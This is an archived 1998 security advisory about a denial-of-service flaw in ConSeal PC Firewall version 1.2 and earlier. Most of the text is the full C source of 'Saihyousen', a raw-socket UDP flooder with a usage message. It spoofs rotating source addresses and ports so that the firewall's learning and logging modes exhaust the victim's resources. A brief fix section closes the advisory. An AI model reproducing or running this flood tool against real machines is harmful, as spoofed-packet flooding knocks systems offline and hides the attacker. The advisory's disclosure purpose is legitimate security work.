|
Vulnerability ConSeal PC Firewall Affected Systems (x86 based) with ConSeal PC Firewall (predate June 1998) Description Max Schau found following. This is a pretty easy DoS against ConSeal PC Firewall. It only works on the versions that predate June 1998 which is version 1.2 or less. But all the little warez pups out there still have the older versions that this works against. This is nothing too special, but a flat out flood didn't work, Max had to throw in some stuff to change the IPs and he found it froze the machine faster if the ports also changed. Saihyousen causes Conseal to eat up ALL of the available resources and can result in a very messy reboot if the attack continues for about 10-30 seconds after the machine froze. /* Saihyousen Attack (*Japanese* Ice Breaker), By Noc-Wage (M.C.S.R) * Base code from arnudp.c but HEAVILY modified. Originally written * sometime early April 1998, I'm a little fuzzy as to the date. * * I take no responsibility for the actions of any script kiddies who * think that running this against some one is a fun way to pass away * their useless lives. I also in NO WAY claim to be good at * programming, so modify it all you want, just leave credit to me * and PLEASE send me a copy of your modified code. * * HOW IT WORKS: * The way this program kills the machine happens in 2 ways * #1 If Conseal is set for "learning" mode the flooding packets from * all the different IPs and ports will cause the program to continously * attempt to write more and more new rules. This eventually uses up * all the resources and results in a freeze and eventually a reboot. * #2 If ConSeal is set to log attacks, once again because of the number * of packets the system resources are eaten up and the machine dies. * * I tested dx2/66 running RedHat 4.0 (12 megs of ram) * as the attacker and a Pentium 233 (64 megs of ram) * as the victim. Using ConSeal The pentium 233 froze after about 5 * seconds of attack. (This is on an ethernet, but I had done live testing * over ppp connection (33.6/28.8) and it took only few more seconds. * Because the packets are so small a 28.8 dial-up would not get lag at * all, 14.4 would get minor after about 20,000 packets. So send as many * as you want, generally 40,000 will kill anything. */ /* Should compile on all linux, not too sure about BSD, if you modify it to make * it better in some way please mail it too me, I'd be interested in seeing it. */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in_systm.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/udp.h> #include <errno.h> #include <strings.h> #include <netdb.h> #include <stdlib.h> #include <stdio.h> #ifdef BROKEN_LIBC #include <arpa/inet.h> #else #define u_char unsigned char #define u_short unsigned short #endif struct sockaddr sa; int main(int argc,char **argv) { int fd; int x=1; int hosti=192; int hostii=168; int hostiii=1; int meep=0; int fooport=1; int numpack=0; char funhost[15]; struct sockaddr_in *p; struct hostent *he; u_char gram[36]= { 0x45, 0x00, 0x00, 0x26, 0x12, 0x34, 0x00, 0x00, 0xFF, 0x11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0x00, 0x12, 0x00, 0x00, '3','1','3','3','7','8','9','0' }; if(argc!=3) { fprintf(stderr,"Saihyousen, by Noc-Wage\n"); fprintf(stderr,"The faster your connection to the internet is (latency wise, not bandwidth)\n"); fprintf(stderr,"and the lower the CPU speed of the victim will\nincrease probability of success\n"); fprintf(stderr,"usage: %s victim num_of_packets Ex: saihyousen 127.0.0.1 40000\n",*argv); exit(1); }; if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1) { perror("requires RAW SOCKETS"); exit(1); }; #ifdef IP_HDRINCL if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0) { perror("setsockopt IP_HDRINCL"); exit(1); }; #else fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n"); #endif /* The stuff below is so that it's not fully sequential i.e 100.100.100.101, 100.100.100.102 */ for (numpack=0;numpack<=atoi(argv[2]);numpack++) { if (meep==0) { ++hosti; meep++; } if (hosti>254) hosti=1; if (meep==1) { ++hostii; meep++;} if (hostii>254) hostii=1; if (meep==2) { ++hostiii; meep=0;} if (hostiii>254) hostiii=1; sprintf( funhost, "%i.%i.%i.%i",hosti,hostii,hostiii,hosti); (he=gethostbyname(funhost)); bcopy(*(he->h_addr_list),(gram+12),4); if((he=gethostbyname(argv[1]))==NULL) { fprintf(stderr,"can't resolve destination hostname\n"); exit(1); }; bcopy(*(he->h_addr_list),(gram+16),4); fooport++; /* resets the port to 1 if it's nearing the end of possible values */ if (fooport>65530) {fooport=1;}; *(u_short*)(gram+20)=htons((u_short)fooport); *(u_short*)(gram+22)=htons((u_short)fooport); p=(struct sockaddr_in*)&sa; p->sin_family=AF_INET; bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr)); if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))== -1) { perror("sendto"); exit(1); }; /* printf("Packet # %i\n", numpack); */ /* Turn that on to see where you are.. it'll slow the attack though */ }; printf("Attack against %s finished", argv[1]); putchar('\n'); return 1; } Solution Well it's fairly simple, disable learning and logging mode. Signal9 has been made aware of this problem LONG before Max decided to release it, so people who actually paid for it and keep their copy updated should have no problems. Those of you out there who used a crack or a key generator are probably the type that sit on IRC warez channels all day. www.signal9.com you can download and upgrade the exsisting copy that you own.